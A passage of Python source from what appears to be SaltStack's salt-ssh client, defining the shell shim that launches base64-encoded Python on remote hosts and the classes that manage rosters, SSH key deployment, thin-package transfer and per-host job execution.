from salt._logging.mixins import MultiprocessingStateMixin
from salt.template import compile_template
from salt.utils.platform import is_junos, is_windows
from salt.utils.process import Process
from salt.utils.zeromq import zmq
try:
import saltwinshell
HAS_WINSHELL = True
except ImportError:
HAS_WINSHELL = False
# The directory where salt thin is deployed
DEFAULT_THIN_DIR = "/var/tmp/.%%USER%%_%%FQDNUUID%%_salt"
# RSTR is just a delimiter to distinguish the beginning of salt STDOUT
# and STDERR. There is no special meaning. Messages prior to RSTR in
# stderr and stdout are either from SSH or from the shim.
#
# RSTR on both stdout and stderr:
# no errors in SHIM - output after RSTR is from salt
# No RSTR in stderr, RSTR in stdout:
# no errors in SSH_SH_SHIM, but SHIM commands for salt master are after
# RSTR in stdout
# No RSTR in stderr, no RSTR in stdout:
# Failure in SHIM
# RSTR in stderr, No RSTR in stdout:
# Undefined behavior
RSTR = "_edbc7885e4f9aac9b83b35999b68d015148caf467b78fa39c05f669c0ff89878"
# The regex to find RSTR in output - Must be on an output line by itself
# NOTE - must use non-grouping match groups or output splitting will fail.
RSTR_RE = r"(?:^|\r?\n)" + RSTR + r"(?:\r?\n|$)"
# METHODOLOGY:
#
# 1) Make the _thinnest_ /bin/sh shim (SSH_SH_SHIM) to find the python
# interpreter and get it invoked
# 2) Once a qualified python is found start it with the SSH_PY_SHIM
# 3) The shim is converted to a single semicolon separated line, so
# some constructs are needed to keep it clean.
# NOTE:
# * SSH_SH_SHIM is generic and can be used to load+exec *any* python
# script on the target.
# * SSH_PY_SHIM is in a separate file rather than stuffed in a string
# in salt/client/ssh/__init__.py - this makes testing *easy* because
# it can be invoked directly.
# * SSH_PY_SHIM is base64 encoded and formatted into the SSH_SH_SHIM
# string. This makes the python script "armored" so that it can
# all be passed in the SSH command and will not need special quoting
# (which likely would be impossibe to do anyway)
# * The formatted SSH_SH_SHIM with the SSH_PY_SHIM payload is a bit
# big (~7.5k). If this proves problematic for an SSH command we
# might try simply invoking "/bin/sh -s" and passing the formatted
# SSH_SH_SHIM on SSH stdin.
# NOTE: there are two passes of formatting:
# 1) Substitute in static values
# - EX_THIN_PYTHON_INVALID - exit code if a suitable python is not found
# 2) Substitute in instance-specific commands
# - DEBUG - enable shim debugging (any non-zero string enables)
# - SUDO - load python and execute as root (any non-zero string enables)
# - SSH_PY_CODE - base64-encoded python code to execute
# - SSH_PY_ARGS - arguments to pass to python code
# This shim generically loads python code . . . and *no* more.
# - Uses /bin/sh for maximum compatibility - then jumps to
# python for ultra-maximum compatibility.
#
# 1. Identify a suitable python
# 2. Jump to python
# Note the list-comprehension syntax to define SSH_SH_SHIM is needed
# to be able to define the string with indentation for readability but
# still strip the white space for compactness and to avoid issues with
# some multi-line embedded python code having indentation errors
SSH_SH_SHIM = "\n".join(
[
s.strip()
for s in r'''/bin/sh << 'EOF'
set -e
set -u
DEBUG="{{DEBUG}}"
if [ -n "$DEBUG" ]
then set -x
fi
SET_PATH="{{SET_PATH}}"
if [ -n "$SET_PATH" ]
then export PATH={{SET_PATH}}
fi
SUDO=""
if [ -n "{{SUDO}}" ]
then SUDO="sudo "
fi
SUDO_USER="{{SUDO_USER}}"
if [ "$SUDO" ] && [ "$SUDO_USER" ]
then SUDO="sudo -u {{SUDO_USER}}"
elif [ "$SUDO" ] && [ -n "$SUDO_USER" ]
then SUDO="sudo "
fi
EX_PYTHON_INVALID={EX_THIN_PYTHON_INVALID}
PYTHON_CMDS="python3 python27 python2.7 python26 python2.6 python2 python"
for py_cmd in $PYTHON_CMDS
do
if command -v "$py_cmd" >/dev/null 2>&1 && "$py_cmd" -c "import sys; sys.exit(not (sys.version_info >= (2, 6)));"
then
py_cmd_path=`"$py_cmd" -c 'from __future__ import print_function;import sys; print(sys.executable);'`
cmdpath=`command -v $py_cmd 2>/dev/null || which $py_cmd 2>/dev/null`
if file $cmdpath | grep "shell script" > /dev/null
then
ex_vars="'PATH', 'LD_LIBRARY_PATH', 'MANPATH', \
'XDG_DATA_DIRS', 'PKG_CONFIG_PATH'"
export `$py_cmd -c \
"from __future__ import print_function;
import sys;
import os;
map(sys.stdout.write, ['{{{{0}}}}={{{{1}}}} ' \
.format(x, os.environ[x]) for x in [$ex_vars]])"`
exec $SUDO PATH=$PATH LD_LIBRARY_PATH=$LD_LIBRARY_PATH \
MANPATH=$MANPATH XDG_DATA_DIRS=$XDG_DATA_DIRS \
PKG_CONFIG_PATH=$PKG_CONFIG_PATH \
"$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
else
exec $SUDO "$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
fi
exit 0
else
continue
fi
done
echo "ERROR: Unable to locate appropriate python command" >&2
exit $EX_PYTHON_INVALID
EOF'''.format(
EX_THIN_PYTHON_INVALID=salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,
).split(
"\n"
)
]
)
if not is_windows() and not is_junos():
shim_file = os.path.join(os.path.dirname(__file__), "ssh_py_shim.py")
if not os.path.exists(shim_file):
# On esky builds we only have the .pyc file
shim_file += "c"
with salt.utils.files.fopen(shim_file) as ssh_py_shim:
SSH_PY_SHIM = ssh_py_shim.read()
else:
SSH_PY_SHIM = None
log = logging.getLogger(__name__)
class SSH(MultiprocessingStateMixin):
"""
Create an SSH execution system
"""
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts):
self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True}
pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc")
if os.path.exists(pull_sock) and zmq:
self.event = salt.utils.event.get_event(
"master", opts["sock_dir"], opts=opts, listen=False
)
else:
self.event = None
self.opts = opts
if self.opts["regen_thin"]:
self.opts["ssh_wipe"] = True
if not salt.utils.path.which("ssh"):
raise salt.exceptions.SaltSystemExit(
code=-1,
msg=(
"No ssh binary found in path -- ssh must be installed for salt-ssh"
" to run. Exiting."
),
)
self.opts["_ssh_version"] = ssh_version()
self.tgt_type = (
self.opts["selected_target_option"]
if self.opts["selected_target_option"]
else "glob"
)
self._expand_target()
self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat"))
self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type)
if not self.targets:
self._update_targets()
# If we're in a wfunc, we need to get the ssh key location from the
# top level opts, stored in __master_opts__
if "__master_opts__" in self.opts:
if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile(
os.path.expanduser("~/.ssh/id_rsa")
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts["__master_opts__"].get(
"ssh_priv",
os.path.join(
self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa"
),
)
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
if priv != "agent-forwarding":
if not os.path.isfile(priv):
try:
salt.client.ssh.shell.gen_key(priv)
except OSError:
raise salt.exceptions.SaltClientError(
"salt-ssh could not be run because it could not generate"
" keys.\n\nYou can probably resolve this by executing this"
" script with increased permissions via sudo or by running as"
" root.\nYou could also use the '-c' option to supply a"
" configuration directory that you have permissions to read and"
" write to."
)
self.defaults = {
"user": self.opts.get(
"ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"]
),
"port": self.opts.get(
"ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"]
),
"passwd": self.opts.get(
"ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"]
),
"priv": priv,
"priv_passwd": self.opts.get(
"ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"]
),
"timeout": self.opts.get(
"ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"]
)
+ self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]),
"sudo": self.opts.get(
"ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"]
),
"sudo_user": self.opts.get(
"ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"]
),
"identities_only": self.opts.get(
"ssh_identities_only",
salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"],
),
"remote_port_forwards": self.opts.get("ssh_remote_port_forwards"),
"ssh_options": self.opts.get("ssh_options"),
}
if self.opts.get("rand_thin_dir"):
self.defaults["thin_dir"] = os.path.join(
"/var/tmp", ".{}".format(uuid.uuid4().hex[:6])
)
self.opts["ssh_wipe"] = "True"
self.returners = salt.loader.returners(self.opts, {})
self.fsclient = salt.fileclient.FSClient(self.opts)
self.thin = salt.utils.thin.gen_thin(
self.opts["cachedir"],
extra_mods=self.opts.get("thin_extra_mods"),
overwrite=self.opts["regen_thin"],
extended_cfg=self.opts.get("ssh_ext_alternatives"),
)
self.mods = mod_data(self.fsclient)
# __setstate__ and __getstate__ are only used on spawning platforms.
def __setstate__(self, state):
super().__setstate__(state)
# This will invoke __init__ of the most derived class.
self.__init__(state["opts"])
def __getstate__(self):
state = super().__getstate__()
state["opts"] = self.opts
return state
@property
def parse_tgt(self):
"""
Method to determine the hostname and user
when bypassing the roster and using
ssh syntax (ex. root@localhost)
"""
if not self.opts.get("ssh_cli_tgt"):
self.opts["ssh_cli_tgt"] = self.opts.get("tgt", "")
hostname = self.opts.get("ssh_cli_tgt", "")
if "@" in hostname:
user, hostname = hostname.split("@", 1)
else:
user = self.opts.get("ssh_user")
return {"hostname": hostname, "user": user}
def _get_roster(self):
"""
Read roster filename as a key to the data.
:return:
"""
roster_file = salt.roster.get_roster_file(self.opts)
if roster_file not in self.__parsed_rosters:
roster_data = compile_template(
roster_file,
salt.loader.render(self.opts, {}),
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
self.__parsed_rosters[roster_file] = roster_data
return roster_file
def _expand_target(self):
"""
Figures out if the target is a reachable host without wildcards, expands if any.
:return:
"""
# TODO: Support -L
hostname = self.parse_tgt["hostname"]
if isinstance(hostname, list):
return
needs_expansion = "*" not in hostname and salt.utils.network.is_reachable_host(
hostname
)
if needs_expansion:
if hostname is None:
# Reverse lookup failed
return
self._get_roster()
for roster_filename in self.__parsed_rosters:
roster_data = self.__parsed_rosters[roster_filename]
if not isinstance(roster_data, bool):
for host_id in roster_data:
try:
roster_host = roster_data[host_id].get("host")
except AttributeError:
roster_host = roster_data[host_id]
if hostname in [host_id, roster_host]:
if hostname != self.opts["tgt"]:
self.opts["tgt"] = hostname
self.__parsed_rosters[self.ROSTER_UPDATE_FLAG] = False
return
def _update_roster(self):
"""
Update default flat roster with the passed in information.
:return:
"""
roster_file = self._get_roster()
if os.access(roster_file, os.W_OK):
if self.__parsed_rosters[self.ROSTER_UPDATE_FLAG]:
with salt.utils.files.fopen(roster_file, "a") as roster_fp:
roster_fp.write(
'# Automatically added by "{s_user}" at {s_time}\n{hostname}:\n'
" host: {hostname}\n user: {user}\n passwd: {passwd}\n".format(
s_user=getpass.getuser(),
s_time=datetime.datetime.utcnow().isoformat(),
hostname=self.opts.get("tgt", ""),
user=self.opts.get("ssh_user", ""),
passwd=self.opts.get("ssh_passwd", ""),
)
)
log.info(
"The host %s has been added to the roster %s",
self.opts.get("tgt", ""),
roster_file,
)
else:
log.error("Unable to update roster %s: access denied", roster_file)
def _update_targets(self):
"""
Uptade targets in case hostname was directly passed without the roster.
:return:
"""
hostname = self.parse_tgt["hostname"]
user = self.parse_tgt["user"]
if hostname == "*":
hostname = ""
if salt.utils.network.is_reachable_host(hostname):
self.opts["tgt"] = hostname
self.targets[hostname] = {
"passwd": self.opts.get("ssh_passwd", ""),
"host": hostname,
"user": user,
}
if self.opts.get("ssh_update_roster"):
self._update_roster()
def get_pubkey(self):
"""
Return the key string for the SSH public key
"""
if (
"__master_opts__" in self.opts
and self.opts["__master_opts__"].get("ssh_use_home_key")
and os.path.isfile(os.path.expanduser("~/.ssh/id_rsa"))
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
pub = "{}.pub".format(priv)
with salt.utils.files.fopen(pub, "r") as fp_:
return "{} rsa root@master".format(fp_.read().split()[1])
def key_deploy(self, host, ret):
"""
Deploy the SSH key if the minions don't auth
"""
if not isinstance(ret[host], dict) or self.opts.get("ssh_key_deploy"):
target = self.targets[host]
if target.get("passwd", False) or self.opts["ssh_passwd"]:
self._key_deploy_run(host, target, False)
return ret
if ret[host].get("stderr", "").count("Permission denied"):
target = self.targets[host]
# permission denied, attempt to auto deploy ssh key
print(
"Permission denied for host {}, do you want to deploy "
"the salt-ssh key? (password required):".format(host)
)
deploy = input("[Y/n] ")
if deploy.startswith(("n", "N")):
return ret
target["passwd"] = getpass.getpass(
"Password for {}@{}: ".format(target["user"], host)
)
return self._key_deploy_run(host, target, True)
return ret
def _key_deploy_run(self, host, target, re_run=True):
"""
The ssh-copy-id routine
"""
argv = [
"ssh.set_auth_key",
target.get("user", "root"),
self.get_pubkey(),
]
single = Single(
self.opts,
argv,
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
if salt.utils.path.which("ssh-copy-id"):
# we have ssh-copy-id, use it!
stdout, stderr, retcode = single.shell.copy_id()
else:
stdout, stderr, retcode = single.run()
if re_run:
target.pop("passwd")
single = Single(
self.opts,
self.opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
stdout, stderr, retcode = single.cmd_block()
try:
data = salt.utils.json.find_json(stdout)
return {host: data.get("local", data)}
except Exception: # pylint: disable=broad-except
if stderr:
return {host: stderr}
return {host: "Bad Return"}
if salt.defaults.exitcodes.EX_OK != retcode:
return {host: stderr}
return {host: stdout}
def handle_routine(self, que, opts, host, target, mine=False):
"""
Run the routine in a "Thread", put a dict on the queue
"""
opts = copy.deepcopy(opts)
single = Single(
opts,
opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
mine=mine,
**target
)
ret = {"id": single.id}
stdout, stderr, retcode = single.run()
# This job is done, yield
try:
data = salt.utils.json.find_json(stdout)
if len(data) < 2 and "local" in data:
ret["ret"] = data["local"]
else:
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
except Exception: # pylint: disable=broad-except
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
que.put(ret)
def handle_ssh(self, mine=False):
"""
Spin up the needed threads or processes and execute the subsequent
routines
"""
que = multiprocessing.Queue()
running = {}
target_iter = self.targets.__iter__()
returned = set()
rets = set()
init = False
while True:
if not self.targets:
log.error("No matching targets found in roster.")
break
if len(running) < self.opts.get("ssh_max_procs", 25) and not init:
try:
host = next(target_iter)
except StopIteration:
init = True
continue
for default in self.defaults:
if default not in self.targets[host]:
self.targets[host][default] = self.defaults[default]
if "host" not in self.targets[host]:
self.targets[host]["host"] = host
if self.targets[host].get("winrm") and not HAS_WINSHELL:
returned.add(host)
rets.add(host)
log_msg = (
"Please contact sales@saltstack.com for access to the"
" enterprise saltwinshell module."
)
log.debug(log_msg)
no_ret = {
"fun_args": [],
"jid": None,
"return": log_msg,
"retcode": 1,
"fun": "",
"id": host,
}
yield {host: no_ret}
continue
args = (
que,
self.opts,
host,
self.targets[host],
mine,
)
routine = Process(target=self.handle_routine, args=args)
routine.start()
running[host] = {"thread": routine}
continue
ret = {}
try:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except queue.Empty:
pass
for host in running:
if not running[host]["thread"].is_alive():
if host not in returned:
# Try to get any returns that came through since we
# last checked
try:
while True:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except queue.Empty:
pass
if host not in returned:
error = (
"Target '{}' did not return any data, "
"probably due to an error.".format(host)
)
ret = {"id": host, "ret": error}
log.error(error)
yield {ret["id"]: ret["ret"]}
running[host]["thread"].join()
rets.add(host)
for host in rets:
if host in running:
running.pop(host)
if len(rets) >= len(self.targets):
break
# Sleep when limit or all threads started
if len(running) >= self.opts.get("ssh_max_procs", 25) or len(
self.targets
) >= len(running):
time.sleep(0.1)
def run_iter(self, mine=False, jid=None):
"""
Execute and yield returns as they come in, do not print to the display
mine
The Single objects will use mine_functions defined in the roster,
pillar, or master config (they will be checked in that order) and
will modify the argv with the arguments from mine_functions
"""
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
for ret in self.handle_ssh(mine=mine):
host = next(iter(ret.keys()))
self.cache_job(jid, host, ret[host], fun)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
yield ret
def cache_job(self, jid, id_, ret, fun):
"""
Cache the job information
"""
self.returners["{}.returner".format(self.opts["master_job_cache"])](
{"jid": jid, "id": id_, "return": ret, "fun": fun}
)
def run(self, jid=None):
"""
Execute the overall routine, print results via outputters
"""
if self.opts.get("list_hosts"):
self._get_roster()
ret = {}
for roster_file in self.__parsed_rosters:
if roster_file.startswith("#"):
continue
ret[roster_file] = {}
for host_id in self.__parsed_rosters[roster_file]:
hostname = self.__parsed_rosters[roster_file][host_id]["host"]
ret[roster_file][host_id] = hostname
salt.output.display_output(ret, "nested", self.opts)
sys.exit()
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
try:
if isinstance(jid, bytes):
jid = jid.decode("utf-8")
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Could not save load with returner %s: %s",
self.opts["master_job_cache"],
exc,
exc_info=True,
)
if self.opts.get("verbose"):
msg = "Executing job with jid {}".format(jid)
print(msg)
print("-" * len(msg) + "\n")
print("")
sret = {}
outputter = self.opts.get("output", "nested")
final_exit = 0
for ret in self.handle_ssh():
host = next(iter(ret.keys()))
if isinstance(ret[host], dict):
host_ret = ret[host].get("retcode", 0)
if host_ret != 0:
final_exit = 1
else:
# Error on host
final_exit = 1
self.cache_job(jid, host, ret[host], fun)
ret = self.key_deploy(host, ret)
if isinstance(ret[host], dict) and (
ret[host].get("stderr") or ""
).startswith("ssh:"):
ret[host] = ret[host]["stderr"]
if not isinstance(ret[host], dict):
p_data = {host: ret[host]}
elif "return" not in ret[host]:
p_data = ret
else:
outputter = ret[host].get("out", self.opts.get("output", "nested"))
p_data = {host: ret[host].get("return", {})}
if self.opts.get("static"):
sret.update(p_data)
else:
salt.output.display_output(p_data, outputter, self.opts)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
if self.event is not None:
self.event.destroy()
if self.opts.get("static"):
salt.output.display_output(sret, outputter, self.opts)
if final_exit:
sys.exit(salt.defaults.exitcodes.EX_AGGREGATE)
class Single:
"""
Hold onto a single ssh execution
"""
# 1. Get command ready
# 2. Check if target has salt
# 3. deploy salt-thin
# 4. execute requested command via salt-thin
def __init__(
self,
opts,
argv,
id_,
host,
user=None,
port=None,
passwd=None,
priv=None,
priv_passwd=None,
timeout=30,
sudo=False,
tty=False,
mods=None,
fsclient=None,
thin=None,
mine=False,
minion_opts=None,
identities_only=False,
sudo_user=None,
remote_port_forwards=None,
winrm=False,
ssh_options=None,
**kwargs
):
# Get mine setting and mine_functions if defined in kwargs (from roster)
self.mine = mine
self.mine_functions = kwargs.get("mine_functions")
self.cmd_umask = kwargs.get("cmd_umask", None)
self.winrm = winrm
self.opts = opts
self.tty = tty
if kwargs.get("disable_wipe"):
self.wipe = False
else:
self.wipe = bool(self.opts.get("ssh_wipe"))
if kwargs.get("thin_dir"):
self.thin_dir = kwargs["thin_dir"]
elif self.winrm:
saltwinshell.set_winvars(self)
self.python_env = kwargs.get("ssh_python_env")
else:
if user:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", user)
else:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", "root")
self.thin_dir = thin_dir.replace(
"%%FQDNUUID%%",
uuid.uuid3(uuid.NAMESPACE_DNS, salt.utils.network.get_fqhostname()).hex[
:6
],
)
self.opts["thin_dir"] = self.thin_dir
self.fsclient = fsclient
self.context = {"master_opts": self.opts, "fileclient": self.fsclient}
self.ssh_pre_flight = kwargs.get("ssh_pre_flight", None)
if self.ssh_pre_flight:
self.ssh_pre_file = os.path.basename(self.ssh_pre_flight)
if isinstance(argv, str):
self.argv = [argv]
else:
self.argv = argv
self.fun, self.args, self.kwargs = self.__arg_comps()
self.id = id_
self.set_path = kwargs.get("set_path", "")
self.mods = mods if isinstance(mods, dict) else {}
args = {
"host": host,
"user": user,
"port": port,
"passwd": passwd,
"priv": priv,
"priv_passwd": priv_passwd,
"timeout": timeout,
"sudo": sudo,
"tty": tty,
"mods": self.mods,
"identities_only": identities_only,
"sudo_user": sudo_user,
"remote_port_forwards": remote_port_forwards,
"winrm": winrm,
"ssh_options": ssh_options,
}
# Pre apply changeable defaults
self.minion_opts = {
"grains_cache": True,
"log_file": "salt-call.log",
}
self.minion_opts.update(opts.get("ssh_minion_opts", {}))
if minion_opts is not None:
self.minion_opts.update(minion_opts)
# Post apply system needed defaults
self.minion_opts.update(
{
"root_dir": os.path.join(self.thin_dir, "running_data"),
"id": self.id,
"sock_dir": "/",
"fileserver_list_cache_time": 3,
}
)
self.minion_config = salt.serializers.yaml.serialize(self.minion_opts)
self.target = kwargs
self.target.update(args)
self.wfuncs = salt.loader.ssh_wrapper(opts, None, self.context)
self.shell = salt.client.ssh.shell.gen_shell(opts, **args)
if self.winrm:
# Determine if Windows client is x86 or AMD64
arch, _, _ = self.shell.exec_cmd("powershell $ENV:PROCESSOR_ARCHITECTURE")
self.arch = arch.strip()
self.thin = thin if thin else salt.utils.thin.thin_path(opts["cachedir"])
def __arg_comps(self):
"""
Return the function name and the arg list
"""
fun = self.argv[0] if self.argv else ""
parsed = salt.utils.args.parse_input(
self.argv[1:], condition=False, no_parse=self.opts.get("no_parse", [])
)
args = parsed[0]
kws = parsed[1]
return fun, args, kws
def _escape_arg(self, arg):
"""
Properly escape argument to protect special characters from shell
interpretation. This avoids having to do tricky argument quoting.
Effectively just escape all characters in the argument that are not
alphanumeric!
"""
if self.winrm:
return arg
return "".join(["\\" + char if re.match(r"\W", char) else char for char in arg])
def run_ssh_pre_flight(self):
"""
Run our pre_flight script before running any ssh commands
"""
script = os.path.join(tempfile.gettempdir(), self.ssh_pre_file)
self.shell.send(self.ssh_pre_flight, script)
return self.execute_script(script)
def check_thin_dir(self):
"""
check if the thindir exists on the remote machine
"""
stdout, stderr, retcode = self.shell.exec_cmd(
"test -d {}".format(self.thin_dir)
)
if retcode != 0:
return False
return True
def deploy(self):
"""
Deploy salt-thin
"""
self.shell.send(
self.thin,
os.path.join(self.thin_dir, "salt-thin.tgz"),
)
self.deploy_ext()
return True
def deploy_ext(self):
"""
Deploy the ext_mods tarball
"""
if self.mods.get("file"):
self.shell.send(
self.mods["file"],
os.path.join(self.thin_dir, "salt-ext_mods.tgz"),
)
return True
def run(self, deploy_attempted=False):
"""
Execute the routine, the routine can be either:
1. Execute a raw shell command
2. Execute a wrapper func
3. Execute a remote Salt command
If a (re)deploy is needed, then retry the operation after a deploy
attempt
Returns tuple of (stdout, stderr, retcode)
"""
stdout = stderr = retcode = None
if self.ssh_pre_flight:
if not self.opts.get("ssh_run_pre_flight", False) and self.check_thin_dir():
log.info(
"%s thin dir already exists. Not running ssh_pre_flight script",
self.thin_dir,
)
elif not os.path.exists(self.ssh_pre_flight):
log.error(
"The ssh_pre_flight script %s does not exist", self.ssh_pre_flight
)
else:
stdout, stderr, retcode = self.run_ssh_pre_flight()
if retcode != 0:
log.error(
"Error running ssh_pre_flight script %s", self.ssh_pre_file
)
return stdout, stderr, retcode
log.info(
"Successfully ran the ssh_pre_flight script: %s", self.ssh_pre_file
)
if self.opts.get("raw_shell", False):
cmd_str = " ".join([self._escape_arg(arg) for arg in self.argv])
stdout, stderr, retcode = self.shell.exec_cmd(cmd_str)
elif self.fun in self.wfuncs or self.mine:
stdout, retcode = self.run_wfunc()
else:
stdout, stderr, retcode = self.cmd_block()
return stdout, stderr, retcode
def run_wfunc(self):
"""
Execute a wrapper function
Returns tuple of (json_data, '')
"""
# Ensure that opts/grains are up to date
# Execute routine
data_cache = False
data = None
cdir = os.path.join(self.opts["cachedir"], "minions", self.id)
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, "ssh_data.p")
refresh = False
if not os.path.isfile(datap):
refresh = True
else:
passed_time = (time.time() - os.stat(datap).st_mtime) / 60
if passed_time > self.opts.get("cache_life", 60):
refresh = True
if self.opts.get("refresh_cache"):
refresh = True
conf_grains = {}
# Save conf file grains before they get clobbered
if "ssh_grains" in self.opts:
conf_grains = self.opts["ssh_grains"]
if not data_cache:
refresh = True
if refresh:
# Make the datap
# TODO: Auto expire the datap
pre_wrapper = salt.client.ssh.wrapper.FunctionWrapper(
self.opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
opts_pkg = pre_wrapper["test.opts_pkg"]() # pylint: disable=E1102
if "_error" in opts_pkg:
# Refresh failed
retcode = opts_pkg["retcode"]
ret = salt.utils.json.dumps({"local": opts_pkg})
return ret, retcode
opts_pkg["file_roots"] = self.opts["file_roots"]
opts_pkg["pillar_roots"] = self.opts["pillar_roots"]
opts_pkg["ext_pillar"] = self.opts["ext_pillar"]
opts_pkg["extension_modules"] = self.opts["extension_modules"]
opts_pkg["module_dirs"] = self.opts["module_dirs"]
opts_pkg["_ssh_version"] = self.opts["_ssh_version"]
opts_pkg["thin_dir"] = self.opts["thin_dir"]
opts_pkg["master_tops"] = self.opts["master_tops"]
opts_pkg["extra_filerefs"] = self.opts.get("extra_filerefs", "")
opts_pkg["__master_opts__"] = self.context["master_opts"]
if "known_hosts_file" in self.opts:
opts_pkg["known_hosts_file"] = self.opts["known_hosts_file"]
if "_caller_cachedir" in self.opts:
opts_pkg["_caller_cachedir"] = self.opts["_caller_cachedir"]
else:
opts_pkg["_caller_cachedir"] = self.opts["cachedir"]
# Use the ID defined in the roster file
opts_pkg["id"] = self.id
retcode = 0
# Restore master grains
for grain in conf_grains:
opts_pkg["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts_pkg["grains"][grain] = self.target["grains"][grain]
popts = {}
popts.update(opts_pkg["__master_opts__"])
popts.update(opts_pkg)
pillar = salt.pillar.Pillar(
popts,
opts_pkg["grains"],
opts_pkg["id"],
opts_pkg.get("saltenv", "base"),
)
pillar_data = pillar.compile_pillar()
# TODO: cache minion opts in datap in master.py
data = {
"opts": opts_pkg,
"grains": opts_pkg["grains"],
"pillar": pillar_data,
}
if data_cache:
with salt.utils.files.fopen(datap, "w+b") as fp_:
fp_.write(salt.payload.dumps(data))
if not data and data_cache:
with salt.utils.files.fopen(datap, "rb") as fp_:
data = salt.payload.load(fp_)
opts = data.get("opts", {})
opts["grains"] = data.get("grains")
# Restore master grains
for grain in conf_grains:
opts["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts["grains"][grain] = self.target["grains"][grain]
opts["pillar"] = data.get("pillar")
wrapper = salt.client.ssh.wrapper.FunctionWrapper(
opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
wrapper.fsclient.opts["cachedir"] = opts["cachedir"]
self.wfuncs = salt.loader.ssh_wrapper(opts, wrapper, self.context)
wrapper.wfuncs = self.wfuncs
# We're running in the mine, need to fetch the arguments from the
# roster, pillar, master config (in that order)
if self.mine:
mine_args = None
mine_fun_data = None
mine_fun = self.fun
if self.mine_functions and self.fun in self.mine_functions:
mine_fun_data = self.mine_functions[self.fun]
elif opts["pillar"] and self.fun in opts["pillar"].get(
"mine_functions", {}
):
mine_fun_data = opts["pillar"]["mine_functions"][self.fun]
elif self.fun in self.context["master_opts"].get("mine_functions", {}):
mine_fun_data = self.context["master_opts"]["mine_functions"][self.fun]
if isinstance(mine_fun_data, dict):
mine_fun = mine_fun_data.pop("mine_function", mine_fun)
